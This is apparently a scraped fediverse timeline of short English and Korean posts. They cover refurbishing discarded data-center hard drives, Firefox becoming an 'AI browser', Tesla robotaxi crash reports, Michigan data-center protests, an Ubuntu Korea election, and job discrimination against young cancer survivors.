Mitch Effendi (ู…ูŠุชุด ุฃูู†ุฏูŠ) @mitch@hoagie.cloud
Quiet public
Shared by Em :official_verified:

@xXgarland @Em0nM4stodonEm :official_verified: that is a fair point but have you considered that data centers throw away an absolute metric FUCKTON of 'dead' spinners that actually just need the platters reseated and the 5 cent read head replaced.

ebay.com/itm/157198500450?_skw

i have wondered why more people havent caught on to this. i'm approaching a petabyte now โ€” you can get them half off if you time it to DC refreshes.

์ค‘๋‹จ์ด ๋ฐœ์ƒํ•˜์—ฌ ์ฃ„์†กํ•ฉ๋‹ˆ๋‹ค.

www.ebay.com

0
0
0
๋“œ๋ผ์ฝ” @draco@pointless.chat
Public

๋ฐฐํƒˆ๋‚˜์„œ ๋‚ด๊ณผ๋ณ‘์› ๊ฐ
์˜์‚ฌ: ์•ฝ ๋“œ์‹œ๊ณ ์š”, ์ „ํ•ด์งˆ ์„ญ์ทจ๊ฐ€ ์ค‘์š”ํ•˜๋‹ˆ ์ด์˜จ์Œ๋ฃŒ ์žˆ์ฃ ? ํฌ์นด๋ฆฌ์Šค์›จํŠธ ๊ฐ™์€๊ฑฐ. ๋งŽ์ด ๋“œ์„ธ์š”. ๊ธฐ๋ฆ„์ง„๊ฑฐ ์ฐฌ๊ฑฐ ๋งค์šด๊ฑฐ ๋“ฑ๋“ฑ ํ”ผํ•˜์‹œ๊ณ ์š”.

์•ฝ์‚ฌ: ์ด์˜จ์Œ๋ฃŒ๋Š” ๋“œ์‹œ๋Š”๋ฐ ํฌ์นด๋ฆฌ์Šค์›จํŠธ ๊ฐ™์€ ๋‹จ๊ฑฐ๋Š” ํ”ผํ•˜์„ธ์š”.

...์ €๊ธฐ ๋‘๋ถ„์ด ํ•ฉ์˜ ์ข€...

0
0
0
0
0
0
0
0
0
0
0
0
OSNews @osnews@mstdn.social
Public
Shared by Cat ๐Ÿˆ๐Ÿฅ— (D.Burch) :blobcatrainbow:

Mozillaโ€™s new CEO: Firefox will become an โ€œAI browserโ€

In recent years, things have not been going well for Mozilla. Firefox's market share is a rounding error, and financially, the company is effectively entirely dependent on free money from Google for making it the default search engine in Firefox. Mozilla's tried to stem the bleeding with deeply unpopular efforts like foc

osnews.com/story/144027/mozill

Mozillaโ€™s new CEO: Firefox will become an โ€œAI browserโ€ โ€“ OSnews

www.osnews.com

0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
Chris Heilmann @codepo8@toot.cafe
Public

Two Different Googles: 30,000+ AI Citations Across AI Mode and AI Overviews Play By Separate Rules otterly.ai/blog/google-ai-mode

Two Different Googles: 30,000+ AI Citations Across AI Mode and AI Overviews Play By Separate Rules

AI Mode vs AI Overviews: New Research Shows Why One SEO Strategy Is No Longer Enough To Win in Google. Explore OtterlyAI's 30K+ Citation Study

otterly.ai ยท Otterly.AI Blog - Best AI Search Monitoring Solution

0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
Hacker News 50 @hn50@social.lansky.name
Public

Tesla Robotaxis in Austin Crash 12.5x More Frequently Than Humans

Link: electrek.co/2025/12/15/tesla-r
Discussion: news.ycombinator.com/item?id=4

Tesla reports another Robotaxi crash, even with supervisor as it moves to remove them

Tesla has reported yet another crash involving its Robotaxi fleet in Austin to the NHTSA. The new data keeps the...

electrek.co ยท Electrek

0
0
0
Hacker News 50 @hn50@social.lansky.name
Public

More than 100 rally against data centers at Michigan Capitol

Link: lansingstatejournal.com/story/
Discussion: news.ycombinator.com/item?id=4

More than 100 rally against data centers at Michigan Capitol

Protesters held signs noting dangers to water and potential electricity rate increases because of data centers being proposed across Michigan.

www.lansingstatejournal.com ยท Lansing State Journal

0
0
0
1
0
0
earthling @appassionato@mastodon.social
Public

The Routledge Handbook on Biochemistry of Exercise by Peter M. Tiidus, 2020

From its early beginnings in the 1960s, the academic field of biochemistry of exercise has expanded beyond examining and describing metabolic responses to exercise and adaptations to training to include a wide understanding of molecular biology, cell signalling, interorgan communication, stem cell physiology...

taylorfrancis.com/books/edit/1





...and a host of other cellular and biochemical mechanisms regulating acute responses and chronic adaptations related to exercise performance, human health/disease, nutrition, and cellular functioning. The Routledge Handbook on Biochemistry of Exercise is the first book to pull together the full depth and breadth of this subject and to update a rapidly expanding field of study with current issues and controversies and a look forward to future research directions. Bringing together many experts and leading scientists, the book emphasizes the current understanding of the underlying metabolic, cellular, genetic, and cell signalling mechanisms associated with physical activity, exercise, training, and athletic performance as they relate to, interact with, and regulate cellular and muscular adaptations and consequent effects on human health/disease, nutrition and weight control, and human performance. With more emphasis than ever on the need to be physically active and the role that being active plays in our overall health from a whole-body level down to the cell, this book makes an important contribution for scholars, medical practitioners, nutritionists, and coaches/trainers working in research and with a wide range of clients. This text is important reading for all students, scholars, and others with an interest in health, nutrition, and exercise/training in general.
0
0
0
1
0
0
Chris Heilmann @codepo8@toot.cafe
Public

Announcing the JavaScript/TypeScript Modernizer for VS Code developer.microsoft.com/blog/j

Announcing the JavaScript/TypeScript Modernizer for VS Code - Microsoft for Developers

Keeping JavaScript/TypeScript projects up-to-date can be a challenge, especially when itโ€™s time to upgrade a bunch of npm packages or adopt the latest frameworks. Weโ€™ve heard from many JS/TS developers that modernizing an older app (upgrading dependencies, fixing breaking changes, etc.) is often tedious and time-consuming. To help with this, weโ€™re excited to introduce the [โ€ฆ]

developer.microsoft.com ยท Microsoft for Developers

0
0
0
Ubuntu Korea Community @UbuntuKrOrg@mastodon.social
Public

[์ƒˆ ํฌ๋Ÿผ ๊ฒŒ์‹œ๋ฌผ] ์šฐ๋ถ„ํˆฌํ•œ๊ตญ์ปค๋ฎค๋‹ˆํ‹ฐ ์ œ8๋Œ€ ๋Œ€ํ‘œ ์„ ๊ฑฐ ์—ฐ์Šต ํˆฌํ‘œ ์•ˆ๋‚ด discourse.ubuntu-kr.org/t/topi

์šฐ๋ถ„ํˆฌํ•œ๊ตญ์ปค๋ฎค๋‹ˆํ‹ฐ ์ œ8๋Œ€ ๋Œ€ํ‘œ ์„ ๊ฑฐ ์—ฐ์Šต ํˆฌํ‘œ ์•ˆ๋‚ด

์•ˆ๋…•ํ•˜์„ธ์š”, ์–ด๋Š์„ธ ๋‚ด์ผ๋ถ€ํ„ฐ ํˆฌํ‘œ ๊ธฐ๊ฐ„์ด ์‹œ์ž‘๋ฉ๋‹ˆ๋‹ค. CIVS ๋ฅผ ์ฒ˜์Œ ์‚ฌ์šฉ ํ•˜์‹œ๋Š” ๋ถ„๋“ค์ด ๋งŽ์œผ์‹ค ๊ฒƒ์œผ๋กœ ๋ณด์—ฌ์„œ, ์—ฐ์Šต ํˆฌํ‘œ๋ฅผ ์ƒ์„ฑ ํ•˜์˜€์Šต๋‹ˆ๋‹ค. ์„ ๊ฑฐ๊ถŒ(ํˆฌํ‘œ๊ถŒ)์ด ์žˆ๋Š” ๋ถ„๋“ค์€ ์•„๋ž˜์™€ ๊ฐ™์€ ์ด๋ฉ”์ผ์ด ๋ฐœ์†ก ๋˜์—ˆ์œผ๋‹ˆ, ํ™•์ธ ํ•˜์…”์„œ ํˆฌํ‘œ๋ฅผ ํ•œ๋ฒˆ ์—ฐ์Šต ํ•ด ๋ณด์‹œ๋ฉด ๋˜๊ฒ ์Šต๋‹ˆ๋‹ค. ํˆฌํ‘œ ์ฐธ์—ฌ ๋ฐฉ๋ฒ•์€ ์•„๋ž˜ ๋ฌธ์„œ๋ฅผ ์ฐธ๊ณ  ํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค! ์—ฐ์Šต์šฉ ํˆฌํ‘œ๋Š” ์˜ค๋Š˜ ์ž์ • ์ดํ›„ ์ฏค ๋งˆ๊ฐ๋˜๋ฉฐ, ๋‚ด์ผ ์ค‘์œผ๋กœ ๋ณธ ํˆฌํ‘œ๊ฐ€ ์‹œ์ž‘ ๋  ์˜ˆ์ •์ž…๋‹ˆ๋‹ค. ์„ ๊ฑฐ ๊ด€๋ จ ๋ฌธ์˜์‚ฌํ•ญ์€ ์ด๋ฉ”์ผ election at ubuntu-kr.org ํ˜น์€ @sukso96100 @98sangbin @Tae @zeroday0619 ์œผ๋กœ ๋ฌธ์˜ ํ•ด ์ฃผ์„ธ์š”.

discourse.ubuntu-kr.org ยท ์šฐ๋ถ„ํˆฌํ•œ๊ตญ์ปค๋ฎค๋‹ˆํ‹ฐ ํฌ๋Ÿผ

0
0
0
tooearly @tooearly@theatrez.day
Public

๊ณผ์—ฐ ์ธ์Šคํƒ€์—์„œ ์—ฌ๊ธฐ๋กœ ๋ช‡ ๋ช…์ด ๋„˜์–ด์˜ฌ๊นŒ?

5๋ช…๋งŒ ๋„˜์–ด์™€๋„ ์ดˆ๋Œ€๋ฐ•์ด๋ผ๋Š” ์ƒ๊ฐ์€ ๋“œ๋Š”๋ฐ...

0
0
0
ํ•œ๊ฒจ๋ ˆ @hanibsky.bsky.social@bsky.brid.gy
Public
Shared by ์ดˆ๋ฌด

์ฒญ๋…„ ์•” ๊ฒฝํ—˜์ž๋“ค์€ ์ผ์ž๋ฆฌ ์ฐพ๊ธฐ๊ฐ€ ์น˜๋ฃŒ๋งŒํผ ํž˜๋“ค๋‹ค๊ณ  ํ˜ธ์†Œํ•ฉ๋‹ˆ๋‹ค. ์ด์ œ ๋ง‰ ์‚ฌํšŒ์— ์ง„์ถœํ•˜๋Š” ์ฒญ๋…„๋“ค์€ ๊ฒฝ๋ ฅ์ด ์—†๊ฑฐ๋‚˜ ์งง์•„ ๋” ๋ง‰๋ง‰ํ•ฉ๋‹ˆ๋‹ค.

โ€œ์•” ํ™˜์ž์˜€์–ด์š”? ์ฑ„์šฉ ๋ชป ํ•ฉ๋‹ˆ๋‹คโ€โ€ฆ์น˜๋ฃŒ๋งŒํผ ํž˜๋“  20...

โ€œ์•” ํ™˜์ž์˜€์–ด์š”? ์ฑ„์šฉ ๋ชป ํ•ฉ๋‹ˆ๋‹คโ€โ€ฆ์น˜๋ฃŒ๋งŒํผ ํž˜๋“  2030 โ€˜์ทจ์—… ์ฐจ๋ณ„โ€™

( โ˜žํ•œ๊ฒจ๋ ˆ ๋‰ด์Šค๋ ˆํ„ฐ H:730 ๊ตฌ๋…ํ•˜๊ธฐ. ๊ฒ€์ƒ‰์ฐฝ์— โ€˜ํ•œ๊ฒจ๋ ˆ h730โ€™์„ ์ณ๋ณด์„ธ์š”.) โ€œ์ž…์‚ฌ ์ง€์›์„œ์— 2๋…„ ๋™์•ˆ ์•” ํˆฌ๋ณ‘์„ ํ–ˆ๋‹ค๋Š” ๊ฑธ ์ ์—ˆ์–ด์š”. 1์ฐจ ์„œ๋ฅ˜ ์‹ฌ์‚ฌ์—์„œ ๊ณ„์† ๋–จ์–ด์กŒ์ฃ .โ€ ํ˜ˆ์•ก์•”์„ ์•“์•˜๋˜ ์˜ค์„ธ์›…(35)์”จ๋Š” ๋‹ค์‹œ ์ทจ์—…์„ ํ•œ๋‹ค๋Š” ๊ฒƒ์ด ํ•œ์—†์ด ๋†’์€ ๋ฒฝ์ด์—ˆ๋‹ค๊ณ  ํ–ˆ๋‹ค

www.hani.co.kr ยท ํ•œ๊ฒจ๋ ˆ

0
0
0
0
0
0
์ดˆ๋ฌด @chomu.dev@bsky.brid.gy
Public

์ด๋Ÿฐ ์• ํ•œํ…Œ ๊ทธ ์ง“๊ฑฐ๋ฆฌ๋ฅผ ํ•ด์„œ ๋ฉ€์ฉกํ•œ ๊ทธ๋ฃน ํ„ฐํŠธ๋ ค ๋จน์€ ๊ทธ ํšŒ์‚ฌ๋ฅผ ์˜์›ํžˆ ์ €์ฃผํ•˜๊ฒŒ ๋จ

0
0
0
0
0
0
:meow_awauu: ์š”์ฆˆ๋ฏธ๋‚˜ ๐ŸŽ„ @Yozumina@serafuku.moe
Public

ํ•ฉ์ • ํ‘ผํฌํˆผ์ด๋ผ๋Š” ์†Œํ’ˆ์ƒต์ด๋ผ๋Š” ๊ณณ์ด ์žˆ์–ด์„œ ๊ฑธ์–ด๊ฐ€๋ณด๋ ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค ์ ์‹ฌ์€ ์ง€๋‚˜๊ฐ€๋‹ค ์ž๋งŒ์ถ”ํ•˜๋Š” ๊ณณ์—์„œ ๋จน์–ด์•ผ์ง€

0
0
0
0
0
0
0
0
0